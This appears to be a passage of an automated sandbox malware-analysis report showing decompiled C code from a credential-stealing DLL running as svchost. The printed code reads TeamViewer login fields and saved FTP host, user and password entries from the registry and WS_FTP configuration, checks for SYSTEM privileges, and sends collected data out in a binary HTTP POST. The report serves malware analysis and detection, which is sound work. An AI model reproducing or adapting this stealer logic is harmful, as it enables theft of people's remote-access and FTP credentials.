						E10001871(_v28);
						_pop(_t79);
						_v28 = _t79;
						SendMessageW(FindWindowExA(_v16, _v12, 0, 0), 0xd, 0x40, _v32);
						_push(E10002A83(_v32));
						E10001871(_v32);
						_pop(_t84);
						_v32 = _t84;
						E10001522(_a4, 0xbeef0000);
						E10001584(_a4, _v28);
						E10001584(_a4, _v32);
						goto L15;
					}
					goto L15;
				}
				_v20 = _t68;
				SendMessageA(_v20, 0xd, 0x40, _v28);
				_t90 = FindWindowExA(_v16, _v20, "Edit", 0);
				if(_t90 != 0) {
					_v20 = _t90;
					_t92 = SendMessageA(_v20, 0xd, 0x40, _v32);
					_t104 = _t92;
					if(_t92 != 0) {
						_v36 = _t92;
						E10001522(_a4, 0xbeef0000);
						E10001584(_a4, _v28);
						E10001584(_a4, _v32);
					}
				}
				goto L15;
			}

Instruction addresses (one per decompiled line, in listing order): 0x100099a4 0x100099a4 0x100099a4 0x100099b9 0x100099c3 0x100099cd 0x100099d7 0x100099e5 0x100099ea 0x100099ec 0x10009b75 0x10009b7b 0x10009b83 0x10009b8b 0x10009b99 0x10009b99 0x100099f2 0x100099f5 0x100099fc 0x10009a15 0x10009a17 0x00000000 0x00000000 0x10009a1d 0x10009a32 0x10009a34 0x10009aa8 0x10009b6d 0x10009b6d 0x10009b6d 0x10009b6f 0x00000000 0x00000000 0x10009ab2 0x10009abb 0x10009ac0 0x10009ac2 0x10009b5e 0x10009b68 0x00000000 0x10009b68 0x10009ac8 0x10009acb 0x10009ace 0x00000000 0x00000000 0x10009ad4 0x10009ad5 0x10009ad8 0x00000000 0x00000000 0x10009adf 0x10009ae2 0x00000000 0x00000000 0x10009aee 0x10009afb 0x10009aff 0x10009b04 0x10009b05 0x10009b1f 0x10009b2c 0x10009b30 0x10009b35 0x10009b36 0x10009b41 0x10009b4c 0x10009b57 0x00000000 0x10009b57 0x00000000 0x10009b6d 0x10009a36 0x10009a43 0x10009a5a 0x10009a5c 0x10009a5e 0x10009a70 0x10009a70 0x10009a72 0x10009a74 0x10009a7f 0x10009a8a 0x10009a95 0x10009a95 0x10009a72 0x00000000

APIs
  • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
• FindWindowExA.USER32(00000000,00000000,00000000,TeamViewer), ref: 100099E5
• FindWindowExA.USER32(?,00000000,00008002,00000000), ref: 10009A10
• FindWindowExA.USER32(00000000,00000000,Edit,00000000), ref: 10009A2D
• SendMessageA.USER32 ref: 10009A43
• FindWindowExA.USER32(00000000,00000000,Edit,00000000), ref: 10009A55
• SendMessageA.USER32 ref: 10009A6B
• FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 10009AA8
• GetClassNameA.USER32(00000000,?,00000040), ref: 10009ABB
• SendMessageW.USER32(?,0000000D,00000040,?), ref: 10009AEE
• FindWindowExA.USER32(00000000,?,00000000,00000000), ref: 10009B12
• SendMessageW.USER32(00000000,0000000D,00000040,?), ref: 10009B1F
  • Part of subcall function 10001584: lstrlenA.KERNEL32(00000000), ref: 10001590
• FindWindowExA.USER32(00000000,?,00000000,00000000), ref: 10009B68
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: FindWindow$MessageSend$AllocClassLocalNamelstrlen
• String ID: Edit$TeamViewer
• API String ID: 1708697226-3332912978
• Opcode ID: 395d9a5a059a4bc752a0990df65af44e1995dfd89007fe728a1d32d8135ea389
• Instruction ID: 544705a3d7d72aa0db6f0d79ba887ddae767a57c35775b498c5cf11cc881283f
• Opcode Fuzzy Hash: 395d9a5a059a4bc752a0990df65af44e1995dfd89007fe728a1d32d8135ea389
• Instruction Fuzzy Hash: B851D875E4060ABAFF129FA0DC03FEDBE72EF01780F104021B614790E9DB76AA519B55
Uniqueness

Uniqueness Score: 1.11%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 386 10003d48-10003dcf call 10001888 * 4 InternetCrackUrlA 395 10003dd1-10003dd5 386->395 396 10003dd7 386->396 395->396 397 10003ddc-10003dfa InternetCreateUrlA 395->397 398 10003f0d-10003f28 call 10001871 * 4 396->398 399 10003e01-10003e40 InternetCrackUrlA 397->399 400 10003dfc 397->400 416 10003f2d-10003f32 398->416 403 10003e42-10003e46 399->403 404 10003e48 399->404 400->398 406 10003e4d-10003e5d ObtainUserAgentString 403->406 404->398 408 10003e7d-10003e98 wsprintfA 406->408 409 10003e5f-10003e7b wsprintfA 406->409 411 10003e9b-10003eac call 1000391d 408->411 409->411 417 10003eb0-10003ed1 call 10003d1a lstrlenA call 100039a1 411->417 418 10003eae 411->418 423 10003ed3 417->423 424 10003ed5-10003ed9 417->424 418->398 425 10003f05-10003f08 closesocket 423->425 426 10003edb-10003ee4 call 100039a1 424->426 427 10003eef-10003ef3 424->427 425->398 430 10003ee9-10003eeb 426->430 427->425 429 10003ef5-10003efe call 10003b95 427->429 433 10003f03 429->433 430->427 432 10003eed 430->432 432->425 433->425
C-Code - Quality: 84%
			E10003D48(void* __edx, void* __eflags, char* _a4, intOrPtr _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v16;
				void* _v20;
				signed int _v40;
				long _v44;
				int _v48;
				void* _v64;
				intOrPtr _v68;
				CHAR* _v72;
				char* _v76;
				int _v80;
				long _v84;
				intOrPtr _v88;
				char _v92;
				int _t79;
				int _t85;
				int _t87;
				int _t90;
				int _t91;
				int _t94;
				int _t95;
				int _t96;
				int _t97;
				int _t99;
				void* _t105;

				_t105 = __edx;
				_t99 = 0;
				_v68 = E10001888(0x1000);
				_v76 = E10001888(0x1000);
				_v72 = E10001888(0x1000);
				_v88 = E10001888(0x1000);
				_v92 = 0x1000;
				memset( &_v64, 0, 0x3c << 0);
				_v64 = 0x3c;
				_push(_v68);
				_pop( *_t10);
				_push(_v76);
				_pop( *_t12);
				_v44 = 0xfff;
				_v16 = 0xfff;
				if(InternetCrackUrlA(_a4, 0, 0x80000000,  &_v64) == 0 || _v48 == 0) {
                                                                                                                                        				} else {
                                                                                                                                        					_v84 = 0xfff;
                                                                                                                                        					_t79 = InternetCreateUrlA( &_v64, 0x80000000, _v72,  &_v84);
                                                                                                                                        					__eflags = _t79;
                                                                                                                                        					if(_t79 != 0) {
                                                                                                                                        						 *_v76 = 0;
                                                                                                                                        						memset( &_v64, 0, 0x3c << 0);
                                                                                                                                        						_v64 = 0x3c;
                                                                                                                                        						_push(_v76);
                                                                                                                                        						_pop( *_t27);
                                                                                                                                        						_v44 = 0xfff;
                                                                                                                                        						_v16 = 0xfff;
                                                                                                                                        						_t85 = InternetCrackUrlA(_v72, 0, 0,  &_v64);
                                                                                                                                        						__eflags = _t85;
                                                                                                                                        						if(_t85 == 0) {
                                                                                                                                        							L7:
                                                                                                                                        							L21:
                                                                                                                                        							E10001871(_v68);
                                                                                                                                        							E10001871(_v72);
                                                                                                                                        							E10001871(_v76);
                                                                                                                                        							E10001871(_v88); // executed
                                                                                                                                        							return _t99;
                                                                                                                                        						}
                                                                                                                                        						__eflags = _v48;
                                                                                                                                        						if(_v48 != 0) {
                                                                                                                                        							_t87 =  &_v92;
                                                                                                                                        							_push(_t87);
                                                                                                                                        							_push(_v88);
                                                                                                                                        							_push(0); // executed
                                                                                                                                        							L1000BA4C(); // executed
                                                                                                                                        							__eflags = _t87;
                                                                                                                                        							if(_t87 < 0) {
                                                                                                                                        								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)");
                                                                                                                                        							} else {
                                                                                                                                        								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, _v88);
                                                                                                                                        							}
                                                                                                                                        							_t90 = E1000391D(_v40 & 0x0000ffff, 0, _v68, 0, _v40 & 0x0000ffff); // executed
                                                                                                                                        							_t91 = _t90;
                                                                                                                                        							__eflags = _t91;
                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                        								_v80 = _t91;
                                                                                                                                        								E10003D1A(_v80); // executed
                                                                                                                                        								_t94 = E100039A1(_v80, _v72, lstrlenA(_v72)); // executed
                                                                                                                                        								_t95 = _t94;
                                                                                                                                        								__eflags = _t95;
                                                                                                                                        								if(_t95 != 0) {
                                                                                                                                        									__eflags = _a12;
                                                                                                                                        									if(_a12 == 0) {
                                                                                                                                        										L18:
                                                                                                                                        										_t99 = _t95;
                                                                                                                                        										__eflags = _t99;
                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                        											_t96 = E10003B95(0, _t105, __eflags, _v80, _a16, _a20); // executed
                                                                                                                                        											_t99 = _t96;
                                                                                                                                        										}
                                                                                                                                        										L20:
                                                                                                                                        										_push(_v80);
                                                                                                                                        										L1000B8EA(); // executed
                                                                                                                                        										goto L21;
                                                                                                                                        									}
                                                                                                                                        									_t97 = E100039A1(_v80, _a8, _a12); // executed
                                                                                                                                        									_t95 = _t97;
                                                                                                                                        									__eflags = _t95;
                                                                                                                                        									if(_t95 != 0) {
                                                                                                                                        										goto L18;
                                                                                                                                        									}
                                                                                                                                        									goto L20;
                                                                                                                                        								}
                                                                                                                                        								goto L20;
                                                                                                                                        							} else {
                                                                                                                                        								goto L21;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						goto L7;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        			}
Instruction addresses (per-line address column of the decompiled view, detached from the code during extraction): 0x10003d48 - 0x10003f32

APIs
  • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
• InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 10003DC8
• InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 10003DF3
• InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 10003E39
• ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 10003E56
• wsprintfA.USER32 ref: 10003E73
• wsprintfA.USER32 ref: 10003E93
  • Part of subcall function 10003D1A: setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 10003D3F
• lstrlenA.KERNEL32(?,00001000,00001000,00001000,00001000), ref: 10003EBE
• closesocket.WSOCK32(?,?,00001000,00001000,00001000,00001000), ref: 10003F08
Strings
• <, xrefs: 10003E13
• POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s, xrefs: 10003E6B, 10003E8B
• Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 10003E7D
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlensetsockopt
• String ID: <$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s
• API String ID: 963220733-2459402781
• Opcode ID: 8a5e1b2448810c0da192a85d48f6fd5ce5595176c10e5f0219c1d7b349ae476c
• Instruction ID: 0888983b5b5e5894467bc943fb656bb7bf28cb1589a5faa9acdf3b18852950b7
• Opcode Fuzzy Hash: 8a5e1b2448810c0da192a85d48f6fd5ce5595176c10e5f0219c1d7b349ae476c
                                                                                                                                        • Instruction Fuzzy Hash: 8951F575D04249EAEF12DFE0CC02BEEBBB9EF08380F508025F610B51A9DB75A915EB11
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                        			E10002BDF(signed int __eax, signed int __edx, intOrPtr _a1) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				void* _v12;
                                                                                                                                        				void* _v16;
                                                                                                                                        				void* _v20;
                                                                                                                                        				signed int _t23;
                                                                                                                                        				void* _t25;
                                                                                                                                        				signed int _t28;
                                                                                                                                        				signed int _t29;
                                                                                                                                        
                                                                                                                                        				_push(_t25);
                                                                                                                                        				_t28 = __edx ^ __eax;
                                                                                                                                        				_t23 = __eax ^ _t28;
                                                                                                                                        				_t29 = _t28 ^ _t23;
                                                                                                                                        				_push(0x10002bf9);
                                                                                                                                        				asm("clc");
                                                                                                                                        				if(_t29 < 0) {
                                                                                                                                        					_t1 = _t25 + 0xf4d43d;
                                                                                                                                        					 *_t1 =  *((char*)(_t25 + 0xf4d43d)) + 1;
                                                                                                                                        					asm("adc [eax], al");
                                                                                                                                        					if( *_t1 == 0 ||  *0x1000f4dc == 0) {
                                                                                                                                        						return 0;
                                                                                                                                        					} else {
                                                                                                                                        						_a1 = _a1 + _t29;
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					return _t23;
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: S-1-5-18
                                                                                                                                        • API String ID: 0-4289277601
                                                                                                                                        • Opcode ID: 9d1b4c49a9f063f5e7fb5eec7ee18641b8813ca66ba2f5df4ee82ff07f12576f
                                                                                                                                        • Instruction ID: 5af963882c6349db28aefbcf9fbaab6c6e5b630de29d917f351d6a793aefbab8
                                                                                                                                        • Opcode Fuzzy Hash: 9d1b4c49a9f063f5e7fb5eec7ee18641b8813ca66ba2f5df4ee82ff07f12576f
                                                                                                                                        • Instruction Fuzzy Hash: D5217C36A10209AFFF02CFA4CC86FAE7BB6EB013C4F108064F511E50A9DB719A54EB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                        			E10002C19() {
                                                                                                                                        				int _t23;
                                                                                                                                        				int _t29;
                                                                                                                                        				void* _t39;
                                                                                                                                        				void* _t43;
                                                                                                                                        
                                                                                                                                        				_t39 = 0;
                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8, _t43 - 4) != 0) {
                                                                                                                                        					 *(_t43 - 8) = 0;
                                                                                                                                        					_t23 = GetTokenInformation( *(_t43 - 4), 1, 0, 0, _t43 - 8); // executed
                                                                                                                                        					if(_t23 == 0 && GetLastError() == 0x7a &&  *(_t43 - 8) != 0) {
                                                                                                                                        						 *(_t43 - 0xc) = E10001888( *(_t43 - 8));
                                                                                                                                        						_t29 = GetTokenInformation( *(_t43 - 4), 1,  *(_t43 - 0xc),  *(_t43 - 8), _t43 - 8); // executed
                                                                                                                                        						if(_t29 != 0) {
                                                                                                                                        							_push(_t43 - 0x10);
                                                                                                                                        							_push( *( *(_t43 - 0xc)));
                                                                                                                                        							if( *0x1000f4e0() != 0) {
                                                                                                                                        								if(lstrcmpA( *(_t43 - 0x10), "S-1-5-18") == 0) {
                                                                                                                                        									_t39 = 1;
                                                                                                                                        								}
                                                                                                                                        								LocalFree( *(_t43 - 0x10));
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						E10001871( *(_t43 - 0xc));
                                                                                                                                        					}
                                                                                                                                        					CloseHandle( *(_t43 - 4)); // executed
                                                                                                                                        				}
                                                                                                                                        				return _t39;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(10002BF9), ref: 10002C1B
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 10002C27
                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 10002C49
                                                                                                                                        • GetLastError.KERNEL32 ref: 10002C53
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000), ref: 10002C7D
                                                                                                                                        • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 10002C91
                                                                                                                                        • lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 10002CA3
                                                                                                                                        • LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 10002CB0
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002CC0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Token$InformationLocalProcess$AllocCloseConvertCurrentErrorFreeHandleLastOpenStringlstrcmp
                                                                                                                                        • String ID: S-1-5-18
                                                                                                                                        • API String ID: 1621329540-4289277601
                                                                                                                                        • Opcode ID: 95bd10a9bb94dc3ed1b792095bf81da213d1d10bc6da382d019e66ef6f7e6cfc
                                                                                                                                        • Instruction ID: 06d48ff545e4ab0d9f1e23b0812814883b401c2b402b61d5d6716e657f03d78c
                                                                                                                                        • Opcode Fuzzy Hash: 95bd10a9bb94dc3ed1b792095bf81da213d1d10bc6da382d019e66ef6f7e6cfc
                                                                                                                                        • Instruction Fuzzy Hash: 1611C536910609BBFF02DFA0CC86FADBBB5EB043C4F104464F611E51A9DB75AA54AB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10005D33(intOrPtr _a4, void* _a8, char* _a12) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				int _v12;
                                                                                                                                        				int _v16;
                                                                                                                                        				char _v2064;
                                                                                                                                        				intOrPtr _v2068;
                                                                                                                                        				intOrPtr _v2072;
                                                                                                                                        				intOrPtr _v2076;
                                                                                                                                        				intOrPtr _v2080;
                                                                                                                                        				char _v2084;
                                                                                                                                        				intOrPtr _v2088;
                                                                                                                                        				intOrPtr _v2092;
                                                                                                                                        				intOrPtr* _v2096;
                                                                                                                                        				char _v2100;
                                                                                                                                        				long _t66;
                                                                                                                                        				long _t67;
                                                                                                                                        				intOrPtr* _t82;
                                                                                                                                        
                                                                                                                                        				_t66 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                                                                                        				_t67 = _t66;
	if(_t67 == 0) {
		_v12 = 0;
		while(1) {
			_v16 = 0x7ff;
			if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
				break;
			}
			_v2068 = E10001DB1(E10001DB1(_a12, "\\"),  &_v2064);
			E10001871(_t72);
			_v2080 = E10001D2A(_a8, _v2068, "Password", 0);
			_v2072 = E10001D2A(_a8, _v2068, "HostName", 0);
			_v2076 = E10001D2A(_a8, _v2068, "UserName", 0);
			_v2088 = E10001D2A(_a8, _v2068, "RemoteDirectory", 0);
			_t82 = E10001D2A( *0x1000f159, _v2068, "PortNumber",  &_v2084);
			if(_t82 == 0 || _v2084 != 4) {
				_t83 = _t82;
				if(_t82 != 0) {
					E10001871(_t83);
				}
				_v2092 = 0x15;
			} else {
				 *_t28 =  *_t82;
				E10001871(_t82);
			}
			_v2096 = E10001D2A(_a8, _v2068, "FSProtocol",  &_v2100);
			if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
				E10001522(_a4, 0xbeef0010);
				E10001584(_a4, _v2072);
				E10001584(_a4, _v2076);
				E10001584(_a4, _v2080);
				E10001522(_a4, _v2092);
				E10001584(_a4, _v2088);
				if(_v2096 == 0 || _v2100 != 4) {
					E10001522(_a4, 0);
				} else {
					E10001522(_a4,  *_v2096);
				}
			}
			E10001871(_v2080);
			E10001871(_v2072);
			E10001871(_v2076);
			E10001871(_v2088);
			E10001871(_v2096);
			E10005D33(_a4, _a8, _v2068);
			E10001871(_v2068);
			_v12 = _v12 + 1;
		}
		return RegCloseKey(_v8);
	}
	return _t67;
}

APIs
• RegOpenKeyA.ADVAPI32(?,?,?), ref: 10005D46
• RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 10005D7A
• RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 10005F90
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
• API String ID: 1332880857-3874328862
• Opcode ID: 38e6ca8cc67d9726efcc16e3e746ac6671f0c446e170c64718ebf116790635fc
• Instruction ID: 14a426d04eaed78736a0683ddc6382c050ee472c636530915fb382d8686ac389
• Opcode Fuzzy Hash: 38e6ca8cc67d9726efcc16e3e746ac6671f0c446e170c64718ebf116790635fc
• Instruction Fuzzy Hash: C051B53980011DEAEF229F60CC06BED7AB9FF04381F10C1A5F55965069DF76AB91AF81
Uniqueness

Uniqueness Score: 12.89%

C-Code - Quality: 100%
E100026B6(char* _a4, char* _a8, int _a12) {
	void* _v8;
	void* _v12;
	char _v273;
	CHAR* _v280;
	long _t24;
	long _t29;
	CHAR* _t36;
	void* _t37;
	long _t45;
	void* _t48;
	void* _t49;

	_t48 = 0;
	_t24 = RegCreateKeyA( *0x1000f159, "Software\\WinRAR",  &_v8); // executed
	if(_t24 == 0) {
		_t45 = RegSetValueExA(_v8, _a4, 0, 3, _a8, _a12); // executed
		if(_t45 == 0) {
			_t48 = 1;
		}
		RegCloseKey(_v8); // executed
	}
	_t49 = _t48;
	if(_t49 == 0) {
		_t29 = GetTempPathA(0x104,  &_v273);
		if(_t29 != 0 && _t29 <= 0x104) {
			CreateDirectoryA( &_v273, 0);
			if(E10002582( &_v273) != 0) {
				_t36 = E10001DB1( &_v273, _a4);
			} else {
				_t36 = E10001E05(E10001DB1( &_v273, "\\"), _a4);
			}
			_v280 = _t36;
			_t37 = CreateFileA(_v280, 0xc0000000, 3, 0, 2, 0, 0);
			_v12 = _t37;
			if(_t37 + 1 != 0) {
				_t49 = E1000145E(_v12, _a8, _a12);
				CloseHandle(_v12);
			}
			_t49 = _t49;
			if(_t49 == 0) {
				DeleteFileA(_v280);
			}
			E10001871(_v280);
		}
	}
	return _t49;
}

APIs
• RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 100026D1
• RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 100026EA
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 100026F7
• GetTempPathA.KERNEL32(00000104,?), ref: 10002710
• CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 10002731
• CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 1000278C
• CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 100027AA
• DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 100027B9
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
• String ID: Software\WinRAR
• API String ID: 3443402316-224198155
• Opcode ID: 4aa9dc4f55051fd92b720c6859483afba20bf0249ab5a0e3e98016433aadca9a
                                                                                                                                        • Instruction ID: f2ecb7b8569c9a255435a7bde00bff913bdbeb92c25537041e106fd312444528
                                                                                                                                        • Opcode Fuzzy Hash: 4aa9dc4f55051fd92b720c6859483afba20bf0249ab5a0e3e98016433aadca9a
                                                                                                                                        • Instruction Fuzzy Hash: D4214C79A0060DBAFF11DFA0DC82FDD7A79EB147C0F1004A5B718A50AADAB1AB509B11
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.27%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10004C5C(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				char _v269;
                                                                                                                                        				CHAR* _v276;
                                                                                                                                        				int _t24;
                                                                                                                                        				void* _t25;
                                                                                                                                        				void* _t26;
                                                                                                                                        				long _t37;
                                                                                                                                        				long _t40;
                                                                                                                                        				void* _t47;
                                                                                                                                        				void* _t48;
                                                                                                                                        				void* _t49;
                                                                                                                                        
                                                                                                                                        				_t49 = __edx;
                                                                                                                                        				_t48 = __ecx;
                                                                                                                                        				_t47 = __ebx;
                                                                                                                                        				_v8 = E100015A9(_a4, 3, 0);
                                                                                                                                        				_t24 = GetWindowsDirectoryA( &_v269, 0x104);
                                                                                                                                        				if(_t24 != 0 && _t24 <= 0x104) {
                                                                                                                                        					_v276 = E10001DB1( &_v269, "\\win.ini");
                                                                                                                                        					_t37 = GetPrivateProfileStringA("WS_FTP", "DIR", 0x1000f137,  &_v269, 0x104, _v276); // executed
                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                        						E10004A84(_t48, _a4,  &_v269, 0);
                                                                                                                                        					}
                                                                                                                                        					_t40 = GetPrivateProfileStringA("WS_FTP", "DEFDIR", 0x1000f137,  &_v269, 0x104, _v276); // executed
                                                                                                                                        					_t53 = _t40;
                                                                                                                                        					if(_t40 != 0) {
                                                                                                                                        						E10004A84(_t48, _a4,  &_v269, 0);
                                                                                                                                        					}
                                                                                                                                        					E10001871(_v276);
                                                                                                                                        				}
                                                                                                                                        				_t25 = E10001E6A(_t53, 0x2b); // executed
                                                                                                                                        				_t26 = _t25;
                                                                                                                                        				_t54 = _t26;
                                                                                                                                        				if(_t26 != 0) {
                                                                                                                                        					E10004A84(_t48, _a4, E10001E05(_t26, "\\Ipswitch\\WS_FTP"), 0); // executed
                                                                                                                                        					E10001871(_t31);
                                                                                                                                        				}
                                                                                                                                        				E10004C10(_t48, _t54, _a4, 0x1a, "\\Ipswitch"); // executed
                                                                                                                                        				E10004C10(_t48, _t54, _a4, 0x23, "\\Ipswitch"); // executed
                                                                                                                                        				E10004C10(_t48, _t54, _a4, 0x1c, "\\Ipswitch"); // executed
                                                                                                                                        				return E100015EF(_t47, _t48, _t49, _t54, _a4, _v8);
                                                                                                                                        			}

                                                                                                                                         Instruction addresses (one per C-code line): 0x10004c5c 0x10004c5c 0x10004c5c 0x10004c71 0x10004c85 0x10004c87 0x10004ca9 0x10004cd0 0x10004cd7 0x10004ce5 0x10004ce5 0x10004d0b 0x10004d10 0x10004d12 0x10004d20 0x10004d20 0x10004d2b 0x10004d2b 0x10004d32 0x10004d37 0x10004d37 0x10004d39 0x10004d4d 0x10004d52 0x10004d52 0x10004d61 0x10004d70 0x10004d7f 0x10004d90

                                                                                                                                        APIs
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 10004C80
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,1000F137,?,00000104,?), ref: 10004CD0
                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,1000F137,?,00000104,?), ref: 10004D0B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
